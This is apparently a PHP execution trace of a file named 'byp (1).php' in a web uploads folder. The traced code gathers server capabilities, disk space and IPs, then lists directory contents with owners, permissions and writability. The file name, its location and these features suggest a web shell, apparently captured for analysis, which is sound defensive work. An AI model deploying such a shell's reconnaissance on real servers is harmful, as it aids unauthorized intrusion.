2 25 0 0.001944 491512 myql 1 /var/www/html/uploads/byp (1).php 10 0
3 26 0 0.001954 491512 function_exists 0 /var/www/html/uploads/byp (1).php 51 1 'mysql_connect'
3 26 1 0.001967 491552
3 26 R FALSE
2 A /var/www/html/uploads/byp (1).php 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001992 491512
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.002006 491512 gzip 1 /var/www/html/uploads/byp (1).php 10 0
3 28 0 0.002017 491512 function_exists 0 /var/www/html/uploads/byp (1).php 53 1 'gzencode'
3 28 1 0.002031 491552
3 28 R TRUE
2 A /var/www/html/uploads/byp (1).php 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.002055 491512
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.002070 491512 mssql 1 /var/www/html/uploads/byp (1).php 10 0
3 30 0 0.002081 491512 function_exists 0 /var/www/html/uploads/byp (1).php 52 1 'mssql_connect'
3 30 1 0.002094 491552
3 30 R FALSE
2 A /var/www/html/uploads/byp (1).php 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.002118 491512
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.002133 491512 postgresql 1 /var/www/html/uploads/byp (1).php 10 0
3 32 0 0.002145 491512 function_exists 0 /var/www/html/uploads/byp (1).php 50 1 'pg_connect'
3 32 1 0.002158 491552
3 32 R FALSE
2 A /var/www/html/uploads/byp (1).php 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.002182 491512
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.002197 491512 oracle 1 /var/www/html/uploads/byp (1).php 10 0
3 34 0 0.002207 491512 function_exists 0 /var/www/html/uploads/byp (1).php 49 1 'ocilogon'
3 34 1 0.002221 491552
3 34 R FALSE
2 A /var/www/html/uploads/byp (1).php 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.002244 491512
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.002259 491512 disk_total_space 0 /var/www/html/uploads/byp (1).php 10 1 '/'
2 35 1 0.002274 491544
2 35 R 232015802368
2 36 0 0.002288 491512 h_size 1 /var/www/html/uploads/byp (1).php 10 1 232015802368
3 37 0 0.002301 491512 round 0 /var/www/html/uploads/byp (1).php 54 1 21608.155441284
3 37 1 0.002315 491544
3 37 R 21608
2 A /var/www/html/uploads/byp (1).php 54 $s = '216.08GB'
2 36 1 0.002340 491552
2 36 R '216.08GB'
2 38 0 0.002354 491552 disk_free_space 0 /var/www/html/uploads/byp (1).php 10 1 '/'
2 38 1 0.002368 491584
2 38 R 199016132608
2 39 0 0.002381 491552 h_size 1 /var/www/html/uploads/byp (1).php 10 1 199016132608
3 40 0 0.002394 491552 round 0 /var/www/html/uploads/byp (1).php 54 1 18534.82170105
3 40 1 0.002407 491584
3 40 R 18535
2 A /var/www/html/uploads/byp (1).php 54 $s = '185.35GB'
2 39 1 0.002431 491592
2 39 R '185.35GB'
1 A /var/www/html/uploads/byp (1).php 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '185.35GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/byp (1).php 10 $n = 'PHP Version'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Zend Version'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Curl'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Register Globals'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'MySQL'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Gzip'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'MsSQL'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Oracle'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Total Space'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Used Space'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Your IP'
1 A /var/www/html/uploads/byp (1).php 10 $n = 'Server IP'
2 41 0 0.002642 491592 curpath 1 /var/www/html/uploads/byp (1).php 34 1 ''
3 42 0 0.002655 491592 getcwd 0 /var/www/html/uploads/byp (1).php 55 0
3 42 1 0.002667 491640
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp (1).php 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/byp (1).php 55 $p = ''
2 A /var/www/html/uploads/byp (1).php 55 $n = ''
3 43 0 0.002711 491640 explode 0 /var/www/html/uploads/byp (1).php 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002726 492216
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp (1).php 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp (1).php 55 $i = 0
2 A /var/www/html/uploads/byp (1).php 55 $g = ''
2 A /var/www/html/uploads/byp (1).php 55 $p .= '/'
2 A /var/www/html/uploads/byp (1).php 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/byp (1).php 55 $i++
2 A /var/www/html/uploads/byp (1).php 55 $g = 'var'
2 A /var/www/html/uploads/byp (1).php 55 $p .= 'var/'
2 A /var/www/html/uploads/byp (1).php 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/byp (1).php 55 $i++
2 A /var/www/html/uploads/byp (1).php 55 $g = 'www'
2 A /var/www/html/uploads/byp (1).php 55 $p .= 'www/'
2 A /var/www/html/uploads/byp (1).php 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/byp (1).php 55 $i++
2 A /var/www/html/uploads/byp (1).php 55 $g = 'html'
2 A /var/www/html/uploads/byp (1).php 55 $p .= 'html/'
2 A /var/www/html/uploads/byp (1).php 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/byp (1).php 55 $i++
2 A /var/www/html/uploads/byp (1).php 55 $g = 'uploads'
2 A /var/www/html/uploads/byp (1).php 55 $p .= 'uploads/'
2 A /var/www/html/uploads/byp (1).php 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/byp (1).php 55 $i++
2 41 1 0.002961 491784
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002982 491592 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 44 1 0.002996 491672
2 44 R '/var/www/html/uploads'
2 45 0 0.003010 491816 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 45 1 0.003024 491896
2 45 R '/var/www/html/uploads'
2 46 0 0.003039 491976 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 46 1 0.003052 492056
2 46 R '/var/www/html/uploads'
2 47 0 0.003066 492040 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 47 1 0.003079 492120
2 47 R '/var/www/html/uploads'
2 48 0 0.003093 492360 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 48 1 0.003108 492440
2 48 R '/var/www/html/uploads'
2 49 0 0.003122 492488 realpath 0 /var/www/html/uploads/byp (1).php 35 1 '.'
2 49 1 0.003134 492568
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/byp (1).php 37 $filex = []
1 A /var/www/html/uploads/byp (1).php 38 $dirx = []
2 50 0 0.003177 491704 opendir 0 /var/www/html/uploads/byp (1).php 40 1 '.'
2 50 1 0.003195 492096
2 50 R resource(4) of type (stream)
1 A /var/www/html/uploads/byp (1).php 40 $handle = resource(4) of type (stream)
2 51 0 0.003222 492064 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 51 1 0.003243 492136
2 51 R '..'
1 A /var/www/html/uploads/byp (1).php 40 $file = '..'
2 52 0 0.003267 492096 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 '..'
2 52 1 0.003282 492144
2 52 R TRUE
1 A /var/www/html/uploads/byp (1).php 40 $dirx[] .= '..'
2 53 0 0.003306 492512 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 53 1 0.003320 492592
2 53 R 'byp (1).php'
1 A /var/www/html/uploads/byp (1).php 40 $file = 'byp (1).php'
2 54 0 0.003344 492520 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 'byp (1).php'
2 54 1 0.003358 492568
2 54 R FALSE
1 A /var/www/html/uploads/byp (1).php 40 $filex[] .= 'byp (1).php'
2 55 0 0.003382 492944 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 55 1 0.003395 493016
2 55 R '.'
1 A /var/www/html/uploads/byp (1).php 40 $file = '.'
2 56 0 0.003417 492936 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 '.'
2 56 1 0.003430 492968
2 56 R TRUE
1 A /var/www/html/uploads/byp (1).php 40 $dirx[] .= '.'
2 57 0 0.003453 492960 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 57 1 0.003467 493040
2 57 R 'prepend.php'
1 A /var/www/html/uploads/byp (1).php 40 $file = 'prepend.php'
2 58 0 0.003491 492968 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 'prepend.php'
2 58 1 0.003506 493016
2 58 R FALSE
1 A /var/www/html/uploads/byp (1).php 40 $filex[] .= 'prepend.php'
2 59 0 0.003530 493016 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 59 1 0.003544 493088
2 59 R 'data'
1 A /var/www/html/uploads/byp (1).php 40 $file = 'data'
2 60 0 0.003567 493008 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 'data'
2 60 1 0.003581 493040
2 60 R TRUE
1 A /var/www/html/uploads/byp (1).php 40 $dirx[] .= 'data'
2 61 0 0.003604 493032 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 61 1 0.003617 493112
2 61 R '.htaccess'
1 A /var/www/html/uploads/byp (1).php 40 $file = '.htaccess'
2 62 0 0.003640 493040 is_dir 0 /var/www/html/uploads/byp (1).php 40 1 '.htaccess'
2 62 1 0.003654 493088
2 62 R FALSE
1 A /var/www/html/uploads/byp (1).php 40 $filex[] .= '.htaccess'
2 63 0 0.003678 493088 readdir 0 /var/www/html/uploads/byp (1).php 40 1 resource(4) of type (stream)
2 63 1 0.003692 493128
2 63 R FALSE
1 A /var/www/html/uploads/byp (1).php 40 $file = FALSE
2 64 0 0.003715 493072 asort 0 /var/www/html/uploads/byp (1).php 40 1 [0 => 'byp (1).php', 1 => 'prepend.php', 2 => '.htaccess']
2 64 1 0.003732 493104
2 64 R TRUE
2 65 0 0.003745 493096 asort 0 /var/www/html/uploads/byp (1).php 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003760 493128
2 65 R TRUE
1 A /var/www/html/uploads/byp (1).php 40 $i = 0
2 66 0 0.003783 493096 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getpwuid'
2 66 1 0.003797 493136
2 66 R TRUE
2 67 0 0.003809 493096 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getgrgid'
2 67 1 0.003822 493136
2 67 R TRUE
2 68 0 0.003835 493096 fileowner 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 68 1 0.003853 493128
2 68 R 0
2 69 0 0.003866 493088 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 69 1 0.003891 493888
2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003941 493856 filegroup 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 70 1 0.003954 493896
2 70 R 0
2 71 0 0.003967 493856 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 71 1 0.003990 494512
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/byp (1).php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.004024 494544 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 72 1 0.004038 494624
2 72 R '/var/www/html/uploads'
2 73 0 0.004053 494640 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 73 1 0.004067 494720
2 73 R '/var/www/html/uploads'
2 74 0 0.004081 494704 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 74 1 0.004094 494784
2 74 R '/var/www/html/uploads'
2 75 0 0.004108 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 75 1 0.004121 495200
2 75 R '/var/www/html/uploads'
2 76 0 0.004135 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 76 1 0.004148 495200
2 76 R '/var/www/html/uploads'
2 77 0 0.004162 495376 get_color 1 /var/www/html/uploads/byp (1).php 41 1 '.'
3 78 0 0.004174 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.'
3 78 1 0.004191 495416
3 78 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = '#ccff00'
3 79 0 0.004215 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.'
3 79 1 0.004230 495416
3 79 R TRUE
3 80 0 0.004243 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.'
3 80 1 0.004256 495416
3 80 R TRUE
2 77 1 0.004269 495376
2 77 R '#ccff00'
2 81 0 0.004283 495376 perms 1 /var/www/html/uploads/byp (1).php 41 1 '.'
3 82 0 0.004294 495376 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '.'
3 82 1 0.004309 495416
3 82 R TRUE
3 83 0 0.004321 495376 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '.'
3 83 1 0.004334 495416
3 83 R 16895
3 84 0 0.004346 495376 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 84 1 0.004360 495760
3 84 R '40777'
3 85 0 0.004373 495696 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 85 1 0.004386 495792
3 85 R '0777'
2 81 1 0.004399 495408
2 81 R '0777'
2 86 0 0.004412 495504 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 86 1 0.004425 495584
2 86 R '/var/www/html/uploads'
2 87 0 0.004439 495504 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 87 1 0.004466 495584
2 87 R '/var/www/html/uploads'
2 88 0 0.004482 495760 perms 1 /var/www/html/uploads/byp (1).php 41 1 '.'
3 89 0 0.004494 495760 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '.'
3 89 1 0.004508 495800
3 89 R TRUE
3 90 0 0.004534 495760 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '.'
3 90 1 0.004546 495800
3 90 R 16895
3 91 0 0.004559 495760 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 91 1 0.004573 496144
3 91 R '40777'
3 92 0 0.004585 496080 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 92 1 0.004598 496176
3 92 R '0777'
2 88 1 0.004611 495792
2 88 R '0777'
1 A /var/www/html/uploads/byp (1).php 41 $i++
2 93 0 0.004636 494480 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getpwuid'
2 93 1 0.004650 494520
2 93 R TRUE
2 94 0 0.004662 494480 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getgrgid'
2 94 1 0.004680 494520
2 94 R TRUE
2 95 0 0.004692 494480 fileowner 0 /var/www/html/uploads/byp (1).php 41 1 '..'
2 95 1 0.004707 494520
2 95 R 0
2 96 0 0.004719 494480 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 96 1 0.004743 495280
2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004784 494480 filegroup 0 /var/www/html/uploads/byp (1).php 41 1 '..'
2 97 1 0.004797 494520
2 97 R 0
2 98 0 0.004810 494480 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 98 1 0.004831 495136
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/byp (1).php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004865 494544 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '..'
2 99 1 0.004878 494616
2 99 R '/var/www/html'
2 100 0 0.004893 494640 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 100 1 0.004907 494720
2 100 R '/var/www/html/uploads'
2 101 0 0.004921 494704 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 101 1 0.004934 494784
2 101 R '/var/www/html/uploads'
2 102 0 0.004949 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 102 1 0.004961 495200
2 102 R '/var/www/html/uploads'
2 103 0 0.004975 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '..'
2 103 1 0.004988 495192
2 103 R '/var/www/html'
2 104 0 0.005002 495376 get_color 1 /var/www/html/uploads/byp (1).php 41 1 '..'
3 105 0 0.005016 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '..'
3 105 1 0.005031 495416
3 105 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = '#ccff00'
3 106 0 0.005054 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '..'
3 106 1 0.005068 495416
3 106 R TRUE
3 107 0 0.005081 495376 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '..'
3 107 1 0.005095 495416
3 107 R TRUE
2 104 1 0.005108 495376
2 104 R '#ccff00'
2 108 0 0.005121 495376 perms 1 /var/www/html/uploads/byp (1).php 41 1 '..'
3 109 0 0.005134 495376 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '..'
3 109 1 0.005148 495416
3 109 R TRUE
3 110 0 0.005160 495376 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '..'
3 110 1 0.005173 495416
3 110 R 16895
3 111 0 0.005185 495376 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 111 1 0.005199 495760
3 111 R '40777'
3 112 0 0.005211 495696 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 112 1 0.005224 495792
3 112 R '0777'
2 108 1 0.005237 495408
2 108 R '0777'
2 113 0 0.005250 495504 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 113 1 0.005263 495584
2 113 R '/var/www/html/uploads'
2 114 0 0.005277 495504 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '..'
2 114 1 0.005290 495576
2 114 R '/var/www/html'
2 115 0 0.005304 495760 perms 1 /var/www/html/uploads/byp (1).php 41 1 '..'
3 116 0 0.005316 495760 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '..'
3 116 1 0.005330 495800
3 116 R TRUE
3 117 0 0.005342 495760 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '..'
3 117 1 0.005354 495800
3 117 R 16895
3 118 0 0.005367 495760 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 118 1 0.005380 496144
3 118 R '40777'
3 119 0 0.005393 496080 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 119 1 0.005406 496176
3 119 R '0777'
2 115 1 0.005418 495792
2 115 R '0777'
1 A /var/www/html/uploads/byp (1).php 41 $i++
2 120 0 0.005441 494480 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getpwuid'
2 120 1 0.005459 494520
2 120 R TRUE
2 121 0 0.005472 494480 function_exists 0 /var/www/html/uploads/byp (1).php 41 1 'posix_getgrgid'
2 121 1 0.005485 494520
2 121 R TRUE
2 122 0 0.005498 494480 fileowner 0 /var/www/html/uploads/byp (1).php 41 1 'data'
2 122 1 0.005512 494520
2 122 R 0
2 123 0 0.005524 494480 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 123 1 0.005547 495280
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005588 494480 filegroup 0 /var/www/html/uploads/byp (1).php 41 1 'data'
2 124 1 0.005600 494520
2 124 R 0
2 125 0 0.005613 494480 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 41 1 0
2 125 1 0.005634 495136
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/byp (1).php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005667 494560 realpath 0 /var/www/html/uploads/byp (1).php 41 1 'data'
2 126 1 0.005683 494648
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005698 494672 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 127 1 0.005712 494752
2 127 R '/var/www/html/uploads'
2 128 0 0.005726 494736 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 128 1 0.005739 494816
2 128 R '/var/www/html/uploads'
2 129 0 0.005754 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 129 1 0.005766 495200
2 129 R '/var/www/html/uploads'
2 130 0 0.005780 495120 realpath 0 /var/www/html/uploads/byp (1).php 41 1 'data'
2 130 1 0.005793 495208
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005808 495504 get_color 1 /var/www/html/uploads/byp (1).php 41 1 'data'
3 132 0 0.005820 495504 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'data'
3 132 1 0.005835 495544
3 132 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = '#ccff00'
3 133 0 0.005859 495504 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'data'
3 133 1 0.005873 495544
3 133 R TRUE
3 134 0 0.005886 495504 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'data'
3 134 1 0.005900 495544
3 134 R TRUE
2 131 1 0.005913 495504
2 131 R '#ccff00'
2 135 0 0.005926 495504 perms 1 /var/www/html/uploads/byp (1).php 41 1 'data'
3 136 0 0.005938 495504 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'data'
3 136 1 0.005952 495544
3 136 R TRUE
3 137 0 0.005965 495504 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'data'
3 137 1 0.005977 495544
3 137 R 16895
3 138 0 0.005989 495504 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 138 1 0.006003 495888
3 138 R '40777'
3 139 0 0.006015 495824 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 139 1 0.006028 495920
3 139 R '0777'
2 135 1 0.006041 495536
2 135 R '0777'
2 140 0 0.006054 495504 realpath 0 /var/www/html/uploads/byp (1).php 41 1 '.'
2 140 1 0.006067 495584
2 140 R '/var/www/html/uploads'
2 141 0 0.006082 495760 realpath 0 /var/www/html/uploads/byp (1).php 41 1 'data'
2 141 1 0.006095 495848
2 141 R '/var/www/html/uploads/data'
2 142 0 0.006110 495760 perms 1 /var/www/html/uploads/byp (1).php 41 1 'data'
3 143 0 0.006122 495760 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'data'
3 143 1 0.006136 495800
3 143 R TRUE
3 144 0 0.006149 495760 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'data'
3 144 1 0.006161 495800
3 144 R 16895
3 145 0 0.006174 495760 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 16895
3 145 1 0.006187 496144
3 145 R '40777'
3 146 0 0.006200 496080 substr 0 /var/www/html/uploads/byp (1).php 57 2 '40777' -4
3 146 1 0.006213 496176
3 146 R '0777'
2 142 1 0.006229 495792
2 142 R '0777'
1 A /var/www/html/uploads/byp (1).php 41 $i++
2 147 0 0.006351 494480 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getpwuid'
2 147 1 0.006366 494520
2 147 R TRUE
2 148 0 0.006378 494480 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getgrgid'
2 148 1 0.006392 494520
2 148 R TRUE
2 149 0 0.006404 494480 fileowner 0 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
2 149 1 0.006419 494528
2 149 R 0
2 150 0 0.006432 494488 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 42 1 0
2 150 1 0.006454 495288
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006496 494488 filegroup 0 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
2 151 1 0.006509 494528
2 151 R 0
2 152 0 0.006521 494488 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 42 1 0
2 152 1 0.006543 495144
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/byp (1).php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006577 494568 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 153 1 0.006591 494648
2 153 R '/var/www/html/uploads'
2 154 0 0.006606 494680 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 154 1 0.006620 494760
2 154 R '/var/www/html/uploads'
2 155 0 0.006634 494744 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 155 1 0.006647 494824
2 155 R '/var/www/html/uploads'
2 156 0 0.006662 495128 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 156 1 0.006675 495208
2 156 R '/var/www/html/uploads'
2 157 0 0.006689 495256 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
2 157 1 0.006704 495344
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006720 495512 get_color 1 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
3 159 0 0.006733 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.htaccess'
3 159 1 0.006749 495552
3 159 R FALSE
3 160 0 0.006762 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.htaccess'
3 160 1 0.006777 495552
3 160 R FALSE
3 161 0 0.006790 495512 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 '.htaccess'
3 161 1 0.006804 495552
3 161 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = ''
3 162 0 0.006829 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 '.htaccess'
3 162 1 0.006843 495552
3 162 R FALSE
3 163 0 0.006856 495512 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 '.htaccess'
3 163 1 0.006870 495552
3 163 R TRUE
2 158 1 0.006883 495512
2 158 R ''
2 164 0 0.006896 495512 perms 1 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
3 165 0 0.006909 495512 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '.htaccess'
3 165 1 0.006924 495552
3 165 R TRUE
3 166 0 0.006936 495512 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '.htaccess'
3 166 1 0.006949 495552
3 166 R 33188
3 167 0 0.006962 495512 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33188
3 167 1 0.006975 495896
3 167 R '100644'
3 168 0 0.006988 495832 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100644' -4
3 168 1 0.007001 495928
3 168 R '0644'
2 164 1 0.007014 495544
2 164 R '0644'
2 169 0 0.007027 495768 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 169 1 0.007041 495848
2 169 R '/var/www/html/uploads'
2 170 0 0.007055 495768 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
2 170 1 0.007069 495856
